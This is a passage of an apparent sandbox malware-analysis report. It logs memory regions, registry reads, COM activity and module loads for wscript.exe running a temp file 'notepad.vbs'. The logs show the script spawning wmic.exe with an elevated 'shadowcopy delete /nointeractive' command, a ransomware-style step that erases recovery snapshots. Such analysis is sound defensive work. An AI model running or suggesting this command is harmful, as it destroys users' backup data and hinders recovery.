private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00150fff	Pagefile Backed Memory	r	-
notepad.vbs	0x00160000	0x00160fff	Memory Mapped File	r	-
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	rw	-
private_0x0000000000270000	0x00270000	0x002effff	Private Memory	rw	-
rsaenh.dll	0x00270000	0x002abfff	Memory Mapped File	r	-
notepad.vbs	0x00270000	0x00270fff	Memory Mapped File	r	... Region Actions Download Dump
wshom.ocx	0x00270000	0x0027bfff	Memory Mapped File	r	-
shell32.dll	0x00280000	0x00292fff	Memory Mapped File	r	-
pagefile_0x00000000002a0000	0x002a0000	0x002a0fff	Pagefile Backed Memory	rw	-
private_0x00000000002b0000	0x002b0000	0x002effff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x0036ffff	Private Memory	rw	-
pagefile_0x0000000000370000	0x00370000	0x00371fff	Pagefile Backed Memory	r	-
oleaccrc.dll	0x00380000	0x00380fff	Memory Mapped File	r	-
pagefile_0x0000000000390000	0x00390000	0x00391fff	Pagefile Backed Memory	r	-
private_0x00000000003a0000	0x003a0000	0x003dffff	Private Memory	rw	-
pagefile_0x00000000003e0000	0x003e0000	0x003e1fff	Pagefile Backed Memory	r	-
private_0x00000000003f0000	0x003f0000	0x004effff	Private Memory	rw	-
pagefile_0x00000000004f0000	0x004f0000	0x00677fff	Pagefile Backed Memory	r	-
cversions.1.db	0x00680000	0x00683fff	Memory Mapped File	r	-
cversions.2.db	0x00680000	0x00683fff	Memory Mapped File	r	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db	0x00690000	0x006aefff	Memory Mapped File	r	-
pagefile_0x00000000006b0000	0x006b0000	0x006b0fff	Pagefile Backed Memory	rw	-
cversions.2.db	0x006c0000	0x006c3fff	Memory Mapped File	r	-
private_0x00000000006d0000	0x006d0000	0x006dffff	Private Memory	rw	-
pagefile_0x00000000006e0000	0x006e0000	0x00860fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000870000	0x00870000	0x0094efff	Pagefile Backed Memory	r	-
private_0x0000000000950000	0x00950000	0x009affff	Private Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x00950000	0x0097ffff	Memory Mapped File	r	-
pagefile_0x0000000000980000	0x00980000	0x00980fff	Pagefile Backed Memory	rw	-
private_0x00000000009a0000	0x009a0000	0x009affff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x009effff	Private Memory	rw	-
wscript.exe	0x00a10000	0x00a35fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a40000	0x00a40000	0x01e3ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001e40000	0x01e40000	0x02182fff	Pagefile Backed Memory	r	-
private_0x0000000002190000	0x02190000	0x021cffff	Private Memory	rw	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x021d0000	0x02235fff	Memory Mapped File	r	-
private_0x0000000002240000	0x02240000	0x0227ffff	Private Memory	rw	-
private_0x0000000002300000	0x02300000	0x0233ffff	Private Memory	rw	-
private_0x0000000002350000	0x02350000	0x0244ffff	Private Memory	rw	-
sortdefault.nls	0x02450000	0x0271efff	Memory Mapped File	r	-
private_0x0000000002720000	0x02720000	0x0275ffff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0287ffff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x0297ffff	Private Memory	rw	-
private_0x0000000002a00000	0x02a00000	0x02a3ffff	Private Memory	rw	-
private_0x0000000002a40000	0x02a40000	0x02b3ffff	Private Memory	rw	-
pagefile_0x0000000002b40000	0x02b40000	0x02f3ffff	Pagefile Backed Memory	rw	-
private_0x0000000003030000	0x03030000	0x0312ffff	Private Memory	rw	-
private_0x0000000003130000	0x03130000	0x0322ffff	Private Memory	rw	-
private_0x0000000003230000	0x03230000	0x0332ffff	Private Memory	rw	-
private_0x0000000003410000	0x03410000	0x0350ffff	Private Memory	rw	-
pagefile_0x0000000003510000	0x03510000	0x03902fff	Pagefile Backed Memory	r	-
ieframe.dll	0x72cb0000	0x7372ffff	Memory Mapped File	rwx	-
oleacc.dll	0x749d0000	0x74a0bfff	Memory Mapped File	rwx	-
apphelp.dll	0x74a10000	0x74a5bfff	Memory Mapped File	rwx	-
scrrun.dll	0x74a60000	0x74a89fff	Memory Mapped File	rwx	-
mpr.dll	0x74a90000	0x74aa1fff	Memory Mapped File	rwx	-
wshom.ocx	0x74ab0000	0x74ad0fff	Memory Mapped File	rwx	-
scrobj.dll	0x74ae0000	0x74b0cfff	Memory Mapped File	rwx	-
comctl32.dll	0x74b10000	0x74b93fff	Memory Mapped File	rwx	-
wshext.dll	0x74ba0000	0x74bb5fff	Memory Mapped File	rwx	-
msisip.dll	0x74bc0000	0x74bc7fff	Memory Mapped File	rwx	-
rsaenh.dll	0x74bd0000	0x74c0afff	Memory Mapped File	rwx	-
vbscript.dll	0x74c10000	0x74c7afff	Memory Mapped File	rwx	-
sxs.dll	0x74c80000	0x74cdefff	Memory Mapped File	rwx	-
dwmapi.dll	0x74ce0000	0x74cf2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x74d00000	0x74d7ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
cryptsp.dll	0x74e40000	0x74e55fff	Memory Mapped File	rwx	-
version.dll	0x74e60000	0x74e68fff	Memory Mapped File	rwx	-
profapi.dll	0x74e70000	0x74e7afff	Memory Mapped File	rwx	-
ntmarta.dll	0x74e80000	0x74ea0fff	Memory Mapped File	rwx	-
propsys.dll	0x74eb0000	0x74fa4fff	Memory Mapped File	rwx	-
comctl32.dll	0x74fb0000	0x7514dfff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
iertutil.dll	0x757f0000	0x759eafff	Memory Mapped File	rwx	-
wintrust.dll	0x759f0000	0x75a1cfff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
wininet.dll	0x75be0000	0x75cd4fff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
devobj.dll	0x75e10000	0x75e21fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
setupapi.dll	0x75ff0000	0x7618cfff	Memory Mapped File	rwx	-
crypt32.dll	0x76190000	0x762acfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
urlmon.dll	0x762e0000	0x76415fff	Memory Mapped File	rwx	-
psapi.dll	0x76420000	0x76424fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76640000	0x76666fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
msasn1.dll	0x772c0000	0x772cbfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	rw	-
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	rw	-
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	rw	-
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	rw	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

COM (5)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	B54F3741-5B07-11CF-A4B0-00AA004A55E8	00000000-0000-0000-C000-000000000046	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Create	6C736DB1-BD94-11D0-8A23-00AA00B58E10	6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	06290BD1-48AA-11D2-8432-006008C3FBFC	E4D1C9B0-46E8-11D4-A2A6-00104BD35090	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	Shell.Application	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Create	WScript.Shell	IUnknown	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn

File (4)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	type = size	1	Fn
Get Info	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	type = size	1	Fn
Read	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	size = 252, size_out = 252	1	Fn Data

Registry (27)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	-	1	Fn
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\.vbs	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\VBSFile\ScriptEngine	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	value_name = Enabled, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = Enabled, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = IgnoreUserSettings, data = 3, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	value_name = LogSecuritySuccesses, data = 3, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = LogSecuritySuccesses, data = 3, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = IgnoreUserSettings, data = 254, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	value_name = TrustPolicy, data = 255, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	value_name = UseWINSAFER, data = 254, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = TrustPolicy, data = 255, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = Timeout, data = 104, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	value_name = Timeout, data = 104, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
Read Value	HKEY_CLASSES_ROOT\.vbs	data = VBSFile, type = REG_SZ	1	Fn
Read Value	HKEY_CLASSES_ROOT\VBSFile\ScriptEngine	data = VBScript, type = REG_SZ	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	wmic.exe	show_window = 42468880		1	Fn

Module (19)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x75a20000	1	Fn
Load	ole32.dll	base_address = 0x75540000	1	Fn
Load	C:\Windows\system32\advapi32.dll	base_address = 0x75b30000	1	Fn
Get Handle	c:\windows\syswow64\wscript.exe	base_address = 0xa10000	3	Fn
Get Handle	c:\windows\syswow64\ole32.dll	base_address = 0x75540000	1	Fn
Get Filename	c:\windows\syswow64\wscript.exe	process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\WScript.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\WScript.exe, size = 261	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSetInformation, address_out = 0x75a35651	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75589d0b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferIdentifyLevel, address_out = 0x75b52102	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferComputeTokenFromLevel, address_out = 0x75b53352	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferCloseLevel, address_out = 0x75b53825	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x75550782	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoGetClassObject, address_out = 0x755754ad	1	Fn
Get Address	c:\windows\syswow64\wscript.exe	function = 1, address_out = 0xa12bb9	1	Fn
Create Mapping	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	filename = C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs, protection = PAGE_READONLY, maximum_size = 252	1	Fn
Map	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	process_name = c:\windows\syswow64\wscript.exe, desired_access = FILE_MAP_READ	1	Fn

Window (2)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = WSH-Timer, wndproc_parameter = 7153016		1	Fn
Set Attribute	-	class_name = WSH-Timer, index = 18446744073709551595, new_long = 7153016		1	Fn

System (14)

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	2	Fn
Get Time	type = System Time, time = 2019-01-04 10:33:27 (UTC)	1	Fn
Get Time	type = Ticks, time = 90714	1	Fn
Get Time	type = Ticks, time = 90854	1	Fn
Get Info	type = Operating System	5	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = System Directory	1	Fn
Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Get Info	type = Hardware Information	1	Fn

Process #4: wmic.exe

Information	Value
ID	#4
File Name	c:\windows\syswow64\wbem\wmic.exe
Command Line	"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:25, Reason: Child Process
Unmonitor	End Time: 00:00:35, Reason: Self Terminated
Monitor Duration	00:00:10

OS Process Information

Information	Value
PID	0x9cc
Parent PID	0x990 (c:\windows\syswow64\wscript.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9D0 0x 9E4 0x 9E8 0x 9EC 0x 9F0 0x 9F4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	r	-
locale.nls	0x000b0000	0x00116fff	Memory Mapped File	r	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	rw	-
wmic.exe.mui	0x00130000	0x0013ffff	Memory Mapped File	rw	-
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	rw	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rw	-
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000170000	0x00170000	0x00170fff	Pagefile Backed Memory	r	-
msxml3r.dll	0x00180000	0x00180fff	Memory Mapped File	r	-
private_0x0000000000190000	0x00190000	0x001affff	Private Memory	-	-
private_0x00000000001b0000	0x001b0000	0x001effff	Private Memory	rw	-
pagefile_0x00000000001f0000	0x001f0000	0x00377fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000380000	0x00380000	0x00381fff	Pagefile Backed Memory	r	-
private_0x0000000000390000	0x00390000	0x0039ffff	Private Memory	rw	-
windowsshell.manifest	0x003a0000	0x003a0fff	Memory Mapped File	r	-
pagefile_0x00000000003a0000	0x003a0000	0x003a0fff	Pagefile Backed Memory	rw	-
private_0x00000000003b0000	0x003b0000	0x0042ffff	Private Memory	rw	-
pagefile_0x0000000000430000	0x00430000	0x005b0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000005c0000	0x005c0000	0x005c1fff	Pagefile Backed Memory	r	-
index.dat	0x005d0000	0x005dffff	Memory Mapped File	rw	-
index.dat	0x005e0000	0x005e7fff	Memory Mapped File	rw	-
private_0x00000000005f0000	0x005f0000	0x006effff	Private Memory	rw	-
index.dat	0x006f0000	0x006fffff	Memory Mapped File	rw	-
pagefile_0x0000000000700000	0x00700000	0x00700fff	Pagefile Backed Memory	r	-
wmic.exe	0x00710000	0x00772fff	Memory Mapped File	rwx	-
pagefile_0x0000000000780000	0x00780000	0x01b7ffff	Pagefile Backed Memory	r	-
private_0x0000000001b80000	0x01b80000	0x01bdffff	Private Memory	rw	-
pagefile_0x0000000001b80000	0x01b80000	0x01b8cfff	Pagefile Backed Memory	rw	-
wmiutils.dll.mui	0x01b80000	0x01b84fff	Memory Mapped File	rw	-
private_0x0000000001ba0000	0x01ba0000	0x01bdffff	Private Memory	rw	-
private_0x0000000001be0000	0x01be0000	0x01c1ffff	Private Memory	rw	-
private_0x0000000001c40000	0x01c40000	0x01c7ffff	Private Memory	rw	-
private_0x0000000001c80000	0x01c80000	0x01d3ffff	Private Memory	rw	-
private_0x0000000001c80000	0x01c80000	0x01ceffff	Private Memory	rw	-
private_0x0000000001d00000	0x01d00000	0x01d3ffff	Private Memory	rw	-
sortdefault.nls	0x01d40000	0x0200efff	Memory Mapped File	r	-
private_0x0000000002010000	0x02010000	0x021effff	Private Memory	rw	-
private_0x0000000002010000	0x02010000	0x0215ffff	Private Memory	rw	-
private_0x0000000002010000	0x02010000	0x020fffff	Private Memory	rw	-
private_0x0000000002010000	0x02010000	0x0206ffff	Private Memory	rw	-
private_0x0000000002070000	0x02070000	0x020bffff	Private Memory	rw	-
private_0x00000000020c0000	0x020c0000	0x020fffff	Private Memory	rw	-
private_0x0000000002120000	0x02120000	0x0215ffff	Private Memory	rw	-
rsaenh.dll	0x02160000	0x0219bfff	Memory Mapped File	r	-
private_0x0000000002160000	0x02160000	0x0219ffff	Private Memory	rw	-
private_0x00000000021b0000	0x021b0000	0x021effff	Private Memory	rw	-
private_0x00000000021f0000	0x021f0000	0x0239ffff	Private Memory	rw	-
private_0x00000000021f0000	0x021f0000	0x022effff	Private Memory	rw	-
kernelbase.dll.mui	0x021f0000	0x022affff	Memory Mapped File	rw	-
private_0x00000000022b0000	0x022b0000	0x022effff	Private Memory	rw	-
private_0x00000000022f0000	0x022f0000	0x0232ffff	Private Memory	rw	-
private_0x0000000002360000	0x02360000	0x0239ffff	Private Memory	rw	-
private_0x00000000023a0000	0x023a0000	0x0279ffff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0289ffff	Private Memory	rw	-
pagefile_0x00000000028a0000	0x028a0000	0x0297efff	Pagefile Backed Memory	r	-
private_0x00000000029a0000	0x029a0000	0x029dffff	Private Memory	rw	-
private_0x0000000002a80000	0x02a80000	0x02abffff	Private Memory	rw	-
private_0x0000000002b00000	0x02b00000	0x02b3ffff	Private Memory	rw	-
private_0x0000000002b60000	0x02b60000	0x02b9ffff	Private Memory	rw	-
private_0x0000000002bd0000	0x02bd0000	0x02c0ffff	Private Memory	rw	-
private_0x0000000002d10000	0x02d10000	0x02d4ffff	Private Memory	rw	-
private_0x0000000002eb0000	0x02eb0000	0x02ebffff	Private Memory	rw	-
wmiutils.dll	0x74990000	0x749a6fff	Memory Mapped File	rwx	-
ntdsapi.dll	0x749c0000	0x749d7fff	Memory Mapped File	rwx	-
fastprox.dll	0x749e0000	0x74a75fff	Memory Mapped File	rwx	-
wbemsvc.dll	0x74a80000	0x74a8efff	Memory Mapped File	rwx	-
msvcr90.dll	0x74a90000	0x74b32fff	Memory Mapped File	rwx	-
comctl32.dll	0x74b40000	0x74cddfff	Memory Mapped File	rwx	-
uxtheme.dll	0x74d00000	0x74d7ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
msoxmlmf.dll	0x74e40000	0x74e4cfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x74e50000	0x74e5dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x74e60000	0x74e9afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74ea0000	0x74eb5fff	Memory Mapped File	rwx	-
dnsapi.dll	0x74ec0000	0x74f03fff	Memory Mapped File	rwx	-
ntmarta.dll	0x74f10000	0x74f30fff	Memory Mapped File	rwx	-
profapi.dll	0x74f40000	0x74f4afff	Memory Mapped File	rwx	-
msxml3.dll	0x74f50000	0x75082fff	Memory Mapped File	rwx	-
wbemcomn.dll	0x75090000	0x750ebfff	Memory Mapped File	rwx	-
wbemprox.dll	0x750f0000	0x750f9fff	Memory Mapped File	rwx	-
secur32.dll	0x75100000	0x75107fff	Memory Mapped File	rwx	-
wtsapi32.dll	0x75110000	0x7511cfff	Memory Mapped File	rwx	-
framedynos.dll	0x75120000	0x75154fff	Memory Mapped File	rwx	-
winnsi.dll	0x75160000	0x75166fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75170000	0x7518bfff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
iertutil.dll	0x757f0000	0x759eafff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
wininet.dll	0x75be0000	0x75cd4fff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
crypt32.dll	0x76190000	0x762acfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
urlmon.dll	0x762e0000	0x76415fff	Memory Mapped File	rwx	-
ws2_32.dll	0x764c0000	0x764f4fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
msasn1.dll	0x772c0000	0x772cbfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
nsi.dll	0x77820000	0x77825fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	rw	-
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	rw	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

COM (7)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	F6D90F12-9C73-11D3-B32E-00C04F990BB4	2933BF95-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	EB87E1BD-3233-11D2-AEC9-00C04FB68820	EB87E1BC-3233-11D2-AEC9-00C04FB68820	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli\ms_409	1	Fn
